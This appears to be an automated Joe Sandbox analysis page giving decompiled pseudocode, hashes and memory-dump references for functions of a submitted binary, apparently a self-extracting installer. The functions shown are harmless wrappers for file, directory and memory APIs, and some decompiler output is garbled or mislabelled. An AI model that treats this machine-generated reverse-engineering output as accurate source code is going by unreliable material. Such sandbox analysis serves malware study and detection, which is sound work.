Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 2e7c38b74275a1d10db6fabc292f24c9b7c881a734d2f7bbb3c64b0cccd58694
Instruction ID: b412e42f3085da2f257a58cf6b4c1cc416868627b9fbf021317bc8eabdf38f56
Opcode Fuzzy Hash: 2e7c38b74275a1d10db6fabc292f24c9b7c881a734d2f7bbb3c64b0cccd58694
Instruction Fuzzy Hash: F4D0127150412147CA742E3CB845AC377E85A86330325176BF6B0E32E4D374DC834694

Uniqueness

Uniqueness Score: -1.00%

Function 004054A0, Relevance: 1.5, APIs: 1, Instructions: 9
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004054A0(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}

0x004054ae
0x004054b6
0x004054ba

APIs

SetFileTime.KERNELBASE(?,?,?,?,004054CA,00000000,00000000,?,00402482,?), ref: 004054AE

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: d00ba419ea0ae4e6e6213418fd014f6d5999ef0473a0d56b55522c41bf13b527
Instruction ID: 1917584adf27ce0176f88e11aa52cbd2cdf9234270b8d6b477bb5c626fe98c97
Opcode Fuzzy Hash: d00ba419ea0ae4e6e6213418fd014f6d5999ef0473a0d56b55522c41bf13b527
Instruction Fuzzy Hash: 56C04C36158205FF8F020F70CC04C1ABFE2EB99311F10C918B169C4070C7328024EB02

Uniqueness

Uniqueness Score: -1.00%

Function 00404826, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00404826(WCHAR* __ecx) {
				signed int _t1;

				_t1 = SetCurrentDirectoryW(__ecx); // executed
				asm("sbb eax, eax");
				return  ~( ~_t1);
			}

0x00404827
0x0040482f
0x00404833

APIs

SetCurrentDirectoryW.KERNELBASE(?,00401490,?,00000001,?,00419240,?,0041B524,;!@InstallEnd@!,?,0041B558,?,00000000,?,?,00000000), ref: 00404827

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: d57684e69020114d10183d2ca0050567171a42a80b8fd26bd4e5665bc9280296
Instruction ID: fec01ce8eb217bf0cfbecdd44f93909942d88e708ff386734e9f039800b2ffe1
Opcode Fuzzy Hash: d57684e69020114d10183d2ca0050567171a42a80b8fd26bd4e5665bc9280296
Instruction Fuzzy Hash: CCA002B07F511B468E241B34DD0986A39549555A037115B687157C50D4DF25C1045554

Uniqueness

Uniqueness Score: -1.00%

Function 00404462, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404462(WCHAR* __ecx, long __edx) {
				signed int _t3;

				_t3 = SetFileAttributesW(__ecx, __edx); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00404464
0x0040446f

APIs

GetLongPathNameW.KERNELBASE(?,00000000,004047EE,?,769682C0,?,00000000), ref: 00404464

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: ed25a719a3732e43e41dd9887838c0a6c9a1d2c5f1583ac5206a53767c946853
Instruction ID: 98a8bcf7e5ee3235dfc47f65db57e9ddc409942bd55006f53268cdc163f6fd1c
Opcode Fuzzy Hash: ed25a719a3732e43e41dd9887838c0a6c9a1d2c5f1583ac5206a53767c946853
Instruction Fuzzy Hash: 02A002A02112099FA6145B315E09B6F29ADEDC9AD1745C96C7415C5060EB29C8509565

Uniqueness

Uniqueness Score: -1.00%

Function 0040447D, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040447D(WCHAR* __ecx) {
				signed int _t3;

				_t3 = CreateDirectoryW(__ecx, 0); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00404480
0x0040448b

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00404A06,00000000,?,00000000,00404A99,?,00000000), ref: 00404480

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 083f4dbc4f2943f1dfb74f92bb0e451d38530cc52b4985dcc65b559a9f8fdd7c
Instruction ID: 34323f3862c9c6fd2d35131ea61d74e0925f70aef560595d1f96e53f70211f96
Opcode Fuzzy Hash: 083f4dbc4f2943f1dfb74f92bb0e451d38530cc52b4985dcc65b559a9f8fdd7c
Instruction Fuzzy Hash: 70A0223030030083E2200B300E0AB0F280CAF08AC0F00C0283208C80E0EB28C0200008

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA0, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404DA0(WCHAR* __ecx) {
				long _t1;

				_t1 = GetFileAttributesW(__ecx); // executed
				if(_t1 == 0xffffffff) {
					return _t1;
				}
				return _t1;
			}

0x00404da1
0x00404daa
0x00000000
0x00404dac
0x00404dae

APIs

GetFileAttributesW.KERNELBASE(?,004050D2,?,?,0000002A,0000005C,?,?,?,00000001), ref: 00404DA1

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 81aac6498f9a46e99a08266c3e76ab7939904c505e4d4e367c054e885d8591d5
Instruction ID: 591aceaef49bad6d6e0eb818f5c395ad730c6046851bbff497a631cd11e1eb05
Opcode Fuzzy Hash: 81aac6498f9a46e99a08266c3e76ab7939904c505e4d4e367c054e885d8591d5
Instruction Fuzzy Hash: 07A011A0820000828A2003302C8808A2A808882332B208B20E230C00E0CB38C800A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00406749, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00406749(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr* _a16) {
				void* _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t20;
				intOrPtr _t23;

				_t23 = _a4;
				_t11 = E004053EE(_a8, _a12,  &_a12); // executed
				_t19 = _a16;
				if(_t19 != 0) {
					 *_t19 = _a12;
				}
				if(_t11 != 0) {
					return 0;
				}
				_t12 = GetLastError();
				_t20 =  *(_t23 + 0x1c);
				__eflags = _t20;
				if(_t20 != 0) {
					return  *((intOrPtr*)( *_t20))( *((intOrPtr*)(_t23 + 0x20)), _t12);
				}
				__eflags = _t12;
				if(__eflags == 0) {
					return 0x80004005;
				}
				if(__eflags > 0) {
					_t14 = _t12 & 0x0000ffff | 0x80070000;
					__eflags = _t14;
					return _t14;
				}
				return _t12;
			}

0x00406750
0x0040675d
0x00406762
0x00406767
0x0040676c
0x0040676c
0x00406770
0x00000000
0x00406772
0x00406776
0x0040677c
0x0040677f
0x00406781
0x00000000
0x00406789
0x0040678d
0x0040678f
0x00000000
0x00406791
0x00406798
0x0040679f
0x0040679f
0x00000000
0x0040679f
0x004067a6

APIs

GetLastError.KERNEL32(?,?,?), ref: 00406776

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 663c19575a8456751b998b43a00a15bb72bda6945b96a8155ca3274f1c07a7d2
Instruction ID: a9f0ad8659e0c22b9764d8725ef8c1a002e24048339c74b3f33957f6e1008843
Opcode Fuzzy Hash: 663c19575a8456751b998b43a00a15bb72bda6945b96a8155ca3274f1c07a7d2
Instruction Fuzzy Hash: E6F03C392002069BDF249F64DC009BB77A9EF45318B11453AAC17EB294D37AE8219BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040349A, Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(013329AD,0041C760), ref: 004034BC

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: fbec6d86ddc02b953b65059a441ef64dc405276a82c6eb60cd8e1f5ad122e0cc
Instruction ID: b3d23f58e68b62f5cabeccff37a264248b7bfe5cd72d47b1d4e8c5ef94cfea58
Opcode Fuzzy Hash: fbec6d86ddc02b953b65059a441ef64dc405276a82c6eb60cd8e1f5ad122e0cc
Instruction Fuzzy Hash: 27F06C771003056AD714AF46E8C1DC6BBDCEB48355B30443FF548D6141D6395554C7BC

Uniqueness

Uniqueness Score: -1.00%

Function 00413840, Relevance: 1.3, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413840(void* __edx) {
				int _t4;
				void* _t6;
				signed int _t8;
				void* _t9;

				_t4 = __edx + 0x80;
				if(_t4 >= __edx) {
					if(_t4 == 0) {
						goto L1;
					} else {
						_t6 = malloc(_t4); // executed
						_t9 = _t6;
						if(_t9 == 0) {
							goto L1;
						} else {
							_t2 = _t9 + 0x80; // 0x80
							_t8 = _t2 & 0xffffff80;
							 *(_t8 - 4) = _t9;
							return _t8;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x00413840
0x00413848
0x0041384f
0x00000000
0x00413851
0x00413852
0x00413858
0x0041385f
0x00000000
0x00413861
0x00413861
0x00413867
0x0041386a
0x0041386d
0x0041386d
0x0041385f
0x0041384a
0x0041384a
0x0041384c
0x0041384c

APIs

malloc.MSVCRT ref: 00413852

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d17c0ca2ced44424d2f780bba9c87b2715d3c144875a3533d3fe3f075a9b9a59
Instruction ID: 9af5a8c9999b4a2f38037104a0b4c214d35f1fab808fcbcdec8469b5e69bc05e
Opcode Fuzzy Hash: d17c0ca2ced44424d2f780bba9c87b2715d3c144875a3533d3fe3f075a9b9a59
Instruction Fuzzy Hash: 6AD05E7021220146EF489F20C949796B2D47F50613F58857AF853CAA91FB2CC6948648

Uniqueness

Uniqueness Score: -1.00%

Function 00413790, Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413790(long __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = VirtualAlloc(0, __ecx, 0x1000, 4); // executed
					return _t1;
				} else {
					return 0;
				}
			}

0x00413792
0x004137a1
0x004137a7
0x00413794
0x00413796
0x00413796

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00410F60), ref: 004137A1

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 98dbc30ccae0949d29e9745611a8297d10c42e2999911135f846b2ac1735627b
Instruction ID: 26fcc7a4b7f8066c4caec3dd40339106bc2c663ef6f5d49925e7066ee81a0dd4
Opcode Fuzzy Hash: 98dbc30ccae0949d29e9745611a8297d10c42e2999911135f846b2ac1735627b
Instruction Fuzzy Hash: 29B012F07A128035FE6807214D0FFFB5A509348B5BF0081B8B715D80C4E7D05440511C

Uniqueness

Uniqueness Score: -1.00%

Function 00413803, Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00413803(void* __eax, void* __ebx, long __edx, void* __esi) {
				intOrPtr* _t2;
				void* _t3;

				asm("rol bl, 0x6a");
				_t2 = __eax + 0x68;
				 *_t2 =  *_t2 + __edx;
				 *_t2 =  *_t2 + _t2;
				_t3 = VirtualAlloc(0, __edx, ??, ??); // executed
				return _t3;
			}

0x00413805
0x00413808
0x0041380a
0x0041380c
0x00413811
0x00413817

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 00413811

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 92735ca84e52f538702ecb6ec21f91555a91a8bffad8afd78f3bc7818ee4d028
Instruction ID: e03e2c2186c6dbf214b011caf4efa4a81c4bf758aef5a93a91a1cadcfefd29ca
Opcode Fuzzy Hash: 92735ca84e52f538702ecb6ec21f91555a91a8bffad8afd78f3bc7818ee4d028
Instruction Fuzzy Hash: 53C08CE1A4D2809FDF0213108C407703F308B8B300F0A00C1E9045B092C2000808C722

Uniqueness

Uniqueness Score: -1.00%

Function 00413760, Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413760(int __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = malloc(__ecx); // executed
					return _t1;
				} else {
					return 0;
				}
			}

0x00413762
0x00413768
0x00413771
0x00413764
0x00413766
0x00413766

APIs

malloc.MSVCRT ref: 00413768

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4e4b97c8df32ee9fc110583acaac8f3580eb89f53c0fc54fed573577a25b04ae
Instruction ID: e9a776f8b561c7906f99c97af60905b4207f6b767d51b374da93a018ac2131ba
Opcode Fuzzy Hash: 4e4b97c8df32ee9fc110583acaac8f3580eb89f53c0fc54fed573577a25b04ae
Instruction Fuzzy Hash: 3FB012F012114012EE1C17382D2819730407640A47BC08478B402C0120F719C114504E

Uniqueness

Uniqueness Score: -1.00%

Function 004137D0, Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004137D0(int __edx) {
				void* _t1;

				if(__edx != 0) {
					_t1 = malloc(__edx); // executed
					return _t1;
				} else {
					return 0;
				}
			}

0x004137d2
0x004137d8
0x004137e1
0x004137d4
0x004137d6
0x004137d6

APIs

malloc.MSVCRT ref: 004137D8

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: ec48c67d9d884d5c2e1c8e50903b5e665513c9d58559f81f173c0722ca0cd9cf
Instruction ID: e1834bf87b784a365167bfedfb21307e6a78aa9792587d0fbed25970968ed474
Opcode Fuzzy Hash: ec48c67d9d884d5c2e1c8e50903b5e665513c9d58559f81f173c0722ca0cd9cf
Instruction Fuzzy Hash: C6B012E8A101C012DA040B342C081933062B6D0507BC4C4B5A40180124FB28D114604D

Uniqueness

Uniqueness Score: -1.00%

Function 00413870, Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413870(void* __edx) {
				void* _t2;
				void* _t3;

				if(__edx != 0) {
					_t3 =  *(__edx - 4);
					free(_t3); // executed
					return _t3;
				}
				return _t2;
			}

0x00413872
0x00413874
0x00413878
0x00000000
0x0041387e
0x0041387f

APIs

free.MSVCRT(?), ref: 00413878

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 08ada9012d3aa8b37d6d1a895f5f94b9464adf61227ada9af42ee5a2db097504
Instruction ID: 12031c54dde89f87e40f0455a88b40bcc2ec3c50dd90033726b53ba6ce8cab4c
Opcode Fuzzy Hash: 08ada9012d3aa8b37d6d1a895f5f94b9464adf61227ada9af42ee5a2db097504
Instruction Fuzzy Hash: 2DB012B590000197CA046BA6940C596F767F698252335C195F50286110CB34C5404704

Uniqueness

Uniqueness Score: -1.00%

Function 004137B0, Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004137B0(void* __ecx) {
				void* _t1;
				int _t2;

				if(__ecx != 0) {
					_t2 = VirtualFree(__ecx, 0, 0x8000); // executed
					return _t2;
				}
				return _t1;
			}

0x004137b2
0x004137bc
0x00000000
0x004137bc
0x004137c2

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,00410F00), ref: 004137BC

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c36a5560efd41710e5581d1eccf0ebd167bcd73a9656c6fea769c839155dd278
Instruction ID: ab9a27aee94bf2fca4435cde870002c3b791476ff69122d908e4da98a3939ee1
Opcode Fuzzy Hash: c36a5560efd41710e5581d1eccf0ebd167bcd73a9656c6fea769c839155dd278
Instruction Fuzzy Hash: D3B012B074130121FD3847100C05B772500A70CF02F20C0587111640C0C6549404450C

Uniqueness

Uniqueness Score: -1.00%

Function 00413823, Relevance: 1.3, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00413823(void* __edx) {
				int _t1;

				_push(cs);
				_t1 = VirtualFree(__edx, 0, 0x8000); // executed
				return _t1;
			}

0x00413823
0x0041382c
0x00413832

APIs

VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0041382C

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 2cf424f09b2a63611f94bf1ef2906656b3368afbdbde5470752f6eddb9b02e63
Instruction ID: 4548bb9808f7885787c00c4898e7365c481cb8737fbf7d0afeb7407147252edf
Opcode Fuzzy Hash: 2cf424f09b2a63611f94bf1ef2906656b3368afbdbde5470752f6eddb9b02e63
Instruction Fuzzy Hash: 5BA00278A8070476ED60A7306D4FFB63A25B78CF01F30C5947251690D0EAE460489A5C

Uniqueness

Uniqueness Score: -1.00%

Function 004137F0, Relevance: 1.3, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004137F0(void* __eax, void* __edx) {
				void* _t1;

				_t1 = __eax;
				free(__edx); // executed
				return _t1;
			}

0x004137f0
0x004137f1
0x004137f8

APIs

free.MSVCRT ref: 004137F1

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c4c572d9f57696b8c0e6e1de3699c55fb71bdc43637c77fb16101d20eef8a5fa
Instruction ID: 7c1fef89f0bccb1a01165ba8deb7b600c8a857a7521b8ae7fdf9e2709f779900
Opcode Fuzzy Hash: c4c572d9f57696b8c0e6e1de3699c55fb71bdc43637c77fb16101d20eef8a5fa
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00413780, Relevance: 1.3, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

free.MSVCRT(?,?,?,00413148), ref: 00413781

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f7127e7e40eaa2db84907b96d6c7057def2c4eed74b735c5d7bd95b468904d09
Instruction ID: 082e6f8f9fdc4bbf4c0095df6602c445876609eb90aa96d1f6ec716ecc535606
Opcode Fuzzy Hash: f7127e7e40eaa2db84907b96d6c7057def2c4eed74b735c5d7bd95b468904d09
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00410138, Relevance: 3.5, APIs: 2, Instructions: 480
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00410138(void* __ecx, signed int __edx, void* __eflags) {
				intOrPtr __ebx;
				void* __edi;
				intOrPtr __esi;
				signed int _t289;
				signed int _t298;
				signed int _t300;
				signed int _t303;
				signed int _t304;
				signed int _t309;
				void* _t313;
				void* _t322;
				intOrPtr _t326;
				signed int _t329;
				signed int _t359;
				unsigned int _t367;
				signed int _t370;
				void* _t371;
				signed int _t374;
				void* _t375;
				intOrPtr* _t378;
				intOrPtr* _t379;
				intOrPtr _t390;
				signed char _t393;
				signed int _t394;
				signed int* _t400;
				unsigned int _t405;
				signed int _t439;
				signed int _t440;
				char _t441;
				signed int _t448;
				void* _t451;
				intOrPtr _t453;
				void* _t454;
				void* _t456;
				void* _t457;

				_t439 = __edx;
				E00418D80(E0041A5C9, _t454);
				_t457 = _t456 - 0x9c;
				_t451 = __ecx;
				_t289 = E0040EA46( *((intOrPtr*)(__ecx + 0x38)));
				_t448 =  *(_t454 + 8);
				 *(_t454 - 0x20) = _t289;
				 *(_t454 - 0x1c) = _t439;
				if(_t289 == 2) {
					_t462 = _t439;
					if(_t439 == 0) {
						E0040EE0F(__ecx, _t439, _t462, _t448 + 0xf8);
						 *(_t454 - 0x20) = E0040EA46( *((intOrPtr*)(_t451 + 0x38)));
						 *(_t454 - 0x1c) = _t439;
					}
				}
